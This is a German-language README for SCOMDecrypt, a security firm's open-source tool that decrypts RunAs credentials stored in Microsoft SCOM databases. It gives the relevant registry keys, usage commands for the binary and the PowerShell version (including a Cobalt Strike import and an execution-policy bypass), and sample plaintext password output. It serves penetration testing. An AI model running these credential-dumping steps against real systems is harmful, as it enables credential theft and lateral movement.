
SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers
Veröffentlicht als Open Source von NCC Group Plc - http://www.nccgroup.trust/
Entwickelt von Richard Warren, richard [dot] warren [at] nccgroup [dot] trust
http://www.github.com/nccgroup/SCOMDecrypt
Veröffentlicht unter AGPL, siehe LICENSE für weitere Informationen
Dieses Tool dient dazu, RunAs-Anmeldeinformationen abzurufen und zu entschlüsseln, die in Microsoft System Center Operations Manager (SCOM)-Datenbanken gespeichert sind.
Hintergrundinformationen finden Sie im NCC-Group-Blogbeitrag hier
Um das Tool auszuführen, benötigen Sie Administratorrechte auf dem SCOM-Server. Außerdem müssen Sie sicherstellen, dass Sie Lesezugriff auf den folgenden Registrierungsschlüssel haben:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\MOMBins
Sie können manuell überprüfen, ob Sie die Datenbank sehen können, indem Sie die Verbindungsdetails aus den folgenden Schlüsseln abrufen:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\Database\DatabaseServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\Database\DatabaseName
Das Tool ist in zwei Formaten verfügbar. Das erste ist eine C#-Binärdatei, die einfach ohne Argumente auf dem SCOM-Server ausgeführt werden kann, wie folgt:
.\SCOMDecrypt.exe
[+] <SCXUser><UserId>bob</UserId><Elev>sudo</Elev></SCXUser>:H a c k T h e P l a n e t
[+] administrator:W i n t e r 2 0 1 5 !
[+] alice:P a s s w 0 r d 1 2 3 !
Es gibt auch eine PowerShell-Version des Tools. Diese ist in einem Post-Exploitation-Szenario nützlich, etwa für den Einsatz mit Tools wie Cobalt Strike oder Empire. Um das Tool mit Cobalt Strike zu verwenden:
powershell-import C:\path\to\SCOMDecrypt.ps1
powershell Invoke-SCOMDecrypt
[+] <SCXUser><UserId>bob</UserId><Elev>sudo</Elev></SCXUser>:H a c k T h e P l a n e t
[+] administrator:W i n t e r 2 0 1 5 !
[+] alice:P a s s w 0 r d 1 2 3 !
Um es in der PowerShell-Konsole auszuführen:
powershell.exe -exec bypass
. .\Invoke-SCOMDecrypt.ps1
Invoke-SCOMDecrypt
...